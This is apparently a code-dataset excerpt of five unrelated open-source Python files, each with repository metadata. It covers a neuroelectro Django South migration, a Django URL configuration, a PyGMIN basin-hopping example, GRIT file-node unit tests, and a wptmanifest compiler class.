'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'neuroelectro.article': {
'Meta': {'object_name': 'Article'},
'abstract': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'}),
'author_list_str': ('django.db.models.fields.CharField', [], {'max_length': '500', 'null': 'True'}),
'authors': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Author']", 'null': 'True', 'symmetrical': 'False'}),
'full_text_link': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'journal': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Journal']", 'null': 'True'}),
'metadata': ('django.db.models.fields.related.ManyToManyField', [], {'default': 'None', 'to': "orm['neuroelectro.MetaData']", 'null': 'True', 'symmetrical': 'False'}),
'pmid': ('django.db.models.fields.IntegerField', [], {}),
'pub_year': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'substances': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Substance']", 'null': 'True', 'symmetrical': 'False'}),
'suggester': ('django.db.models.fields.related.ForeignKey', [], {'default': 'None', 'to': "orm['neuroelectro.User']", 'null': 'True'}),
'terms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.MeshTerm']", 'null': 'True', 'symmetrical': 'False'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.articlefulltext': {
'Meta': {'object_name': 'ArticleFullText'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'full_text': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'})
},
'neuroelectro.articlesummary': {
'Meta': {'object_name': 'ArticleSummary'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_neurons': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.author': {
'Meta': {'object_name': 'Author'},
'first': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'initials': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'last': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'middle': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'})
},
'neuroelectro.brainregion': {
'Meta': {'object_name': 'BrainRegion'},
'abbrev': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
'allenid': ('django.db.models.fields.IntegerField', [], {'default': '0', 'null': 'True'}),
'color': ('django.db.models.fields.CharField', [], {'max_length': '10', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'isallen': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'treedepth': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.datasource': {
'Meta': {'object_name': 'DataSource'},
'data_table': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataTable']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user_submission': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.UserSubmission']", 'null': 'True'}),
'user_upload': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.UserUpload']", 'null': 'True'})
},
'neuroelectro.datatable': {
'Meta': {'object_name': 'DataTable'},
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.CharField', [], {'max_length': '1000'}),
'needs_expert': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'table_html': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'table_text': ('django.db.models.fields.CharField', [], {'max_length': '10000', 'null': 'True'})
},
'neuroelectro.ephysconceptmap': {
'Meta': {'object_name': 'EphysConceptMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'dt_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match_quality': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'ref_text': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataSource']"}),
'times_validated': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'neuroelectro.ephysprop': {
'Meta': {'object_name': 'EphysProp'},
'definition': ('django.db.models.fields.CharField', [], {'max_length': '1000', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.EphysPropSyn']", 'symmetrical': 'False'}),
'units': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Unit']", 'null': 'True'})
},
'neuroelectro.ephyspropsummary': {
'Meta': {'object_name': 'EphysPropSummary'},
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'num_articles': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_neurons': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'value_mean_articles': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_mean_neurons': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_sd_articles': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_sd_neurons': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.ephyspropsyn': {
'Meta': {'object_name': 'EphysPropSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'neuroelectro.insituexpt': {
'Meta': {'object_name': 'InSituExpt'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'imageseriesid': ('django.db.models.fields.IntegerField', [], {}),
'plane': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'regionexprs': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.RegionExpr']", 'null': 'True', 'symmetrical': 'False'}),
'valid': ('django.db.models.fields.BooleanField', [], {'default': 'True'})
},
'neuroelectro.institution': {
'Meta': {'object_name': 'Institution'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '2', 'null': 'True'}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'})
},
'neuroelectro.journal': {
'Meta': {'object_name': 'Journal'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'short_title': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.meshterm': {
'Meta': {'object_name': 'MeshTerm'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.metadata': {
'Meta': {'object_name': 'MetaData'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'value': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'neuroelectro.neuron': {
'Meta': {'object_name': 'Neuron'},
'added_by': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'}),
'nlex_id': ('django.db.models.fields.CharField', [], {'max_length': '100', 'null': 'True'}),
'regions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.BrainRegion']", 'null': 'True', 'symmetrical': 'False'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.NeuronSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.neuronarticlemap': {
'Meta': {'object_name': 'NeuronArticleMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'article': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Article']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_mentions': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.neuronconceptmap': {
'Meta': {'object_name': 'NeuronConceptMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'dt_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match_quality': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'ref_text': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataSource']"}),
'times_validated': ('django.db.models.fields.IntegerField', [], {'default': '0'})
},
'neuroelectro.neuronephysdatamap': {
'Meta': {'object_name': 'NeuronEphysDataMap'},
'added_by': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']", 'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'dt_id': ('django.db.models.fields.CharField', [], {'max_length': '20', 'null': 'True'}),
'ephys_concept_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysConceptMap']"}),
'err': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'match_quality': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'metadata': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.MetaData']", 'symmetrical': 'False'}),
'n': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'neuron_concept_map': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.NeuronConceptMap']"}),
'ref_text': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.DataSource']"}),
'times_validated': ('django.db.models.fields.IntegerField', [], {'default': '0'}),
'val': ('django.db.models.fields.FloatField', [], {}),
'val_norm': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.neuronephyssummary': {
'Meta': {'object_name': 'NeuronEphysSummary'},
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'ephys_prop': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.EphysProp']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_articles': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'value_mean': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'value_sd': ('django.db.models.fields.FloatField', [], {'null': 'True'})
},
'neuroelectro.neuronsummary': {
'Meta': {'object_name': 'NeuronSummary'},
'cluster_xval': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'cluster_yval': ('django.db.models.fields.FloatField', [], {'null': 'True'}),
'data': ('django.db.models.fields.TextField', [], {'default': "''"}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'neuron': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Neuron']"}),
'num_articles': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_ephysprops': ('django.db.models.fields.IntegerField', [], {'null': 'True'}),
'num_nedms': ('django.db.models.fields.IntegerField', [], {'null': 'True'})
},
'neuroelectro.neuronsyn': {
'Meta': {'object_name': 'NeuronSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.protein': {
'Meta': {'object_name': 'Protein'},
'allenid': ('django.db.models.fields.IntegerField', [], {}),
'common_name': ('django.db.models.fields.CharField', [], {'max_length': '400', 'null': 'True'}),
'entrezid': ('django.db.models.fields.IntegerField', [], {}),
'gene': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'in_situ_expts': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.InSituExpt']", 'null': 'True', 'symmetrical': 'False'}),
'is_channel': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '400'}),
'synonyms': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.ProteinSyn']", 'null': 'True', 'symmetrical': 'False'})
},
'neuroelectro.proteinsyn': {
'Meta': {'object_name': 'ProteinSyn'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.regionexpr': {
'Meta': {'object_name': 'RegionExpr'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'region': ('django.db.models.fields.related.ForeignKey', [], {'default': '0', 'to': "orm['neuroelectro.BrainRegion']"}),
'val': ('django.db.models.fields.FloatField', [], {})
},
'neuroelectro.species': {
'Meta': {'object_name': 'Species'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '500'})
},
'neuroelectro.substance': {
'Meta': {'object_name': 'Substance'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'term': ('django.db.models.fields.CharField', [], {'max_length': '300'})
},
'neuroelectro.unit': {
'Meta': {'object_name': 'Unit'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'prefix': ('django.db.models.fields.CharField', [], {'max_length': '1'})
},
'neuroelectro.user': {
'Meta': {'object_name': 'User', '_ormbases': ['auth.User']},
'assigned_neurons': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['neuroelectro.Neuron']", 'null': 'True', 'symmetrical': 'False'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.Institution']", 'null': 'True'}),
'is_curator': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'lab_head': ('django.db.models.fields.CharField', [], {'max_length': '50', 'null': 'True'}),
'lab_website_url': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True'}),
'last_update': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'null': 'True', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'})
},
'neuroelectro.usersubmission': {
'Meta': {'object_name': 'UserSubmission'},
'data': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']"})
},
'neuroelectro.userupload': {
'Meta': {'object_name': 'UserUpload'},
'data': ('picklefield.fields.PickledObjectField', [], {'null': 'True'}),
'date_mod': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'path': ('django.db.models.fields.FilePathField', [], {'max_length': '100'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['neuroelectro.User']"})
}
}
complete_apps = ['neuroelectro']
|
neuroelectro/neuroelectro_org
|
neuroelectro/south_migrations/0048_auto__add_field_ephysconceptmap_added_by__add_field_neuronephysdatamap.py
|
Python
|
gpl-2.0
| 26,623
|
[
"NEURON"
] |
0703d5c88f155afa826798ebc8aff7854af353b721593b31d2bbf5170722460d
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.conf import settings
from django.conf.urls import include, url
from django.conf.urls.static import static
from django.contrib import admin
from django.views import defaults as default_views
from imagery.impart import views
urlpatterns = [
url(settings.ADMIN_URL, admin.site.urls),
url(r"^$", views.index, name="home"),
url(r"^artist/(?P<artist_id>[0-9]+)/", views.artist, name="artist"),
url(r"^archive/", views.archive, name="archive"),
] + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
if settings.DEBUG:
# This allows the error pages to be debugged during development; just visit
# these URLs in a browser to see how the error pages look.
# TODO: style these!
urlpatterns += [
url(
r"^400/$",
default_views.bad_request,
kwargs={"exception": Exception("Bad Request!")},
),
url(
r"^403/$",
default_views.permission_denied,
kwargs={"exception": Exception("Permission Denied")},
),
url(
r"^404/$",
default_views.page_not_found,
kwargs={"exception": Exception("Page not Found")},
),
url(r"^500/$", default_views.server_error),
]
if "debug_toolbar" in settings.INSTALLED_APPS:
import debug_toolbar
urlpatterns += [url(r"^__debug__/", include(debug_toolbar.urls))]
|
jw/imagery
|
config/urls.py
|
Python
|
mit
| 1,482
|
[
"VisIt"
] |
b3bd916bba044ec852b1964a59031d52c1ba06572b0c986ceb90d0dc6ee1645e
|
# -*- coding: iso-8859-1 -*-
############################################################
# Example 5: Adding a custom takestep routine. This example
# takes 100 Monte Carlo steps as one basin-hopping step.
############################################################
import numpy as np
import pygmin.potentials.lj as lj
import pygmin.basinhopping as bh
from pygmin.takestep import displace
from pygmin.mc import MonteCarlo
class TakeStepMonteCarlo:
def __init__(self, pot, T=10., nsteps=100, stepsize=0.1):
self.potential = pot
self.T = T
self.nsteps = nsteps
self.mcstep = displace.RandomDisplacement(stepsize=stepsize)
def takeStep(self, coords, **kwargs):
# Run a fresh Monte Carlo walk for this basin-hopping step
mc = MonteCarlo(coords, self.potential, self.mcstep,
temperature=self.T, outstream=None)
mc.run(self.nsteps)
coords[:] = mc.coords[:]
def updateStep(self, acc, **kwargs):
pass
natoms = 12
# random initial coordinates
coords=np.random.random(3*natoms)
potential = lj.LJ()
step = TakeStepMonteCarlo(potential)
opt = bh.BasinHopping(coords, potential, takeStep=step)
opt.run(100)
# some visualization
try:
import pygmin.utils.pymolwrapper as pym
pym.start()
pym.draw_spheres(opt.coords, "A", 1)
except:
print "Could not draw using pymol, skipping this step"
|
js850/PyGMIN
|
examples/basinhopping_no_system_class/5_custom_takestep.py
|
Python
|
gpl-3.0
| 1,412
|
[
"PyMOL"
] |
870d7843116057e632a02fad70c21dd358945f5d7699ca7ebb6b9d3fedc8f1fe
|
#!/usr/bin/env python3
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
'''Unit tests for node_io.FileNode'''
from __future__ import print_function
import os
import sys
import unittest
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
from six import StringIO
from grit.node import misc
from grit.node import node_io
from grit.node import empty
from grit import grd_reader
from grit import util
def _GetAllCliques(root_node):
"""Return all cliques in the |root_node| tree."""
ret = []
for node in root_node:
ret.extend(node.GetCliques())
return ret
class FileNodeUnittest(unittest.TestCase):
def testGetPath(self):
root = misc.GritNode()
root.StartParsing(u'grit', None)
root.HandleAttribute(u'latest_public_release', u'0')
root.HandleAttribute(u'current_release', u'1')
root.HandleAttribute(u'base_dir', r'..\resource')
translations = empty.TranslationsNode()
translations.StartParsing(u'translations', root)
root.AddChild(translations)
file_node = node_io.FileNode()
file_node.StartParsing(u'file', translations)
file_node.HandleAttribute(u'path', r'flugel\kugel.pdf')
translations.AddChild(file_node)
root.EndParsing()
self.failUnless(root.ToRealPath(file_node.GetInputPath()) ==
util.normpath(
os.path.join(r'../resource', r'flugel/kugel.pdf')))
def VerifyCliquesContainEnglishAndFrenchAndNothingElse(self, cliques):
self.assertEqual(2, len(cliques))
for clique in cliques:
self.assertEqual({'en', 'fr'}, set(clique.clique.keys()))
def testLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<file path="generated_resources_fr.xtb" lang="fr" />
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(_GetAllCliques(grd))
def testIffyness(self):
grd = grd_reader.Parse(StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<if expr="lang == 'fr'">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>Joi</ex></ph></message>
</messages>
</release>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
cliques = _GetAllCliques(grd)
self.assertEqual(2, len(cliques))
for clique in cliques:
self.assertEqual({'en'}, set(clique.clique.keys()))
grd.SetOutputLanguage('fr')
grd.RunGatherers()
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(_GetAllCliques(grd))
def testConditionalLoadTranslations(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<translations>
<if expr="True">
<file path="generated_resources_fr.xtb" lang="fr" />
</if>
<if expr="False">
<file path="no_such_file.xtb" lang="de" />
</if>
</translations>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO(xml),
util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
self.VerifyCliquesContainEnglishAndFrenchAndNothingElse(_GetAllCliques(grd))
def testConditionalOutput(self):
xml = '''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3"
base_dir=".">
<outputs>
<output filename="resource.h" type="rc_header" />
<output filename="en/generated_resources.rc" type="rc_all"
lang="en" />
<if expr="pp_if('NOT_TRUE')">
<output filename="de/generated_resources.rc" type="rc_all"
lang="de" />
</if>
</outputs>
<release seq="3">
<messages>
<message name="ID_HELLO">Hello!</message>
</messages>
</release>
</grit>'''
grd = grd_reader.Parse(StringIO(xml),
util.PathFromRoot('grit/test/data'),
defines={})
grd.SetOutputLanguage('en')
grd.RunGatherers()
outputs = grd.GetChildrenOfType(node_io.OutputNode)
active = set(grd.ActiveDescendants())
self.failUnless(outputs[0] in active)
self.failUnless(outputs[0].GetType() == 'rc_header')
self.failUnless(outputs[1] in active)
self.failUnless(outputs[1].GetType() == 'rc_all')
self.failUnless(outputs[2] not in active)
self.failUnless(outputs[2].GetType() == 'rc_all')
# Verify that 'iw' and 'no' language codes in xtb files are mapped to 'he' and
# 'nb'.
def testLangCodeMapping(self):
grd = grd_reader.Parse(StringIO('''<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" source_lang_id="en-US" current_release="3" base_dir=".">
<translations>
<file path="generated_resources_no.xtb" lang="nb" />
<file path="generated_resources_iw.xtb" lang="he" />
</translations>
<release seq="3">
<messages></messages>
</release>
</grit>'''), util.PathFromRoot('grit/testdata'))
grd.SetOutputLanguage('en')
grd.RunGatherers()
self.assertEqual([], _GetAllCliques(grd))
if __name__ == '__main__':
unittest.main()
|
chromium/chromium
|
tools/grit/grit/node/node_io_unittest.py
|
Python
|
bsd-3-clause
| 6,562
|
[
"xTB"
] |
e5bc01991451fb517d5d567a5ae86e986a0b385ac84d5f8dcb77f2cc6dbb3fcb
|
import abc
from ..node import NodeVisitor
from ..parser import parse
class Compiler(NodeVisitor):
__metaclass__ = abc.ABCMeta
def compile(self, tree, data_cls_getter=None, **kwargs):
self._kwargs = kwargs
return self._compile(tree, data_cls_getter, **kwargs)
def _compile(self, tree, data_cls_getter=None, **kwargs):
"""Compile a raw AST into a form where conditional expressions
are represented by ConditionalValue objects that can be evaluated
at runtime.
tree - The root node of the wptmanifest AST to compile
data_cls_getter - A function taking two parameters; the previous
output node and the current ast node and returning
the class of the output node to use for the current
ast node
"""
if data_cls_getter is None:
self.data_cls_getter = lambda x, y: ManifestItem
else:
self.data_cls_getter = data_cls_getter
self.tree = tree
self.output_node = self._initial_output_node(tree, **kwargs)
self.visit(tree)
if hasattr(self.output_node, "set_defaults"):
self.output_node.set_defaults()
assert self.output_node is not None
return self.output_node
def _initial_output_node(self, node, **kwargs):
return self.data_cls_getter(None, None)(node, **kwargs)
def visit_DataNode(self, node):
if node != self.tree:
output_parent = self.output_node
self.output_node = self.data_cls_getter(self.output_node, node)(node, **self._kwargs)
else:
output_parent = None
assert self.output_node is not None
for child in node.children:
self.visit(child)
if output_parent is not None:
# Append to the parent *after* processing all the node data
output_parent.append(self.output_node)
self.output_node = self.output_node.parent
assert self.output_node is not None
@abc.abstractmethod
def visit_KeyValueNode(self, node):
pass
def visit_ListNode(self, node):
return [self.visit(child) for child in node.children]
def visit_ValueNode(self, node):
return node.data
def visit_AtomNode(self, node):
return node.data
@abc.abstractmethod
def visit_ConditionalNode(self, node):
pass
def visit_StringNode(self, node):
indexes = [self.visit(child) for child in node.children]
def value(x):
rv = node.data
for index in indexes:
rv = rv[index(x)]
return rv
return value
def visit_NumberNode(self, node):
if "." in node.data:
return float(node.data)
else:
return int(node.data)
def visit_VariableNode(self, node):
indexes = [self.visit(child) for child in node.children]
def value(x):
data = x[node.data]
for index in indexes:
data = data[index(x)]
return data
return value
def visit_IndexNode(self, node):
assert len(node.children) == 1
return self.visit(node.children[0])
@abc.abstractmethod
def visit_UnaryExpressionNode(self, node):
pass
@abc.abstractmethod
def visit_BinaryExpressionNode(self, node):
pass
@abc.abstractmethod
def visit_UnaryOperatorNode(self, node):
pass
@abc.abstractmethod
def visit_BinaryOperatorNode(self, node):
pass
class ManifestItem(object):
def __init__(self, node, **kwargs):
self.parent = None
self.node = node
self.children = []
self._data = {}
def __repr__(self):
return "<%s %s>" % (self.__class__, self.node.data)
def __str__(self):
rv = [repr(self)]
for item in self.children:
rv.extend(" %s" % line for line in str(item).split("\n"))
return "\n".join(rv)
def set_defaults(self):
pass
@property
def is_empty(self):
if self._data:
return False
return all(child.is_empty for child in self.children)
@property
def root(self):
node = self
while node.parent is not None:
node = node.parent
return node
@property
def name(self):
return self.node.data
def get(self, key):
for node in [self, self.root]:
if key in node._data:
return node._data[key]
raise KeyError
def set(self, name, value):
self._data[name] = value
def remove(self):
if self.parent:
self.parent.children.remove(self)
self.parent = None
def iterchildren(self, name=None):
for item in self.children:
if item.name == name or name is None:
yield item
def has_key(self, key):
for node in [self, self.root]:
if key in node._data:
return True
return False
def _flatten(self):
rv = {}
for node in [self, self.root]:
for name, value in node._data.items():
if name not in rv:
rv[name] = value
return rv
def iteritems(self):
for item in self._flatten().items():
yield item
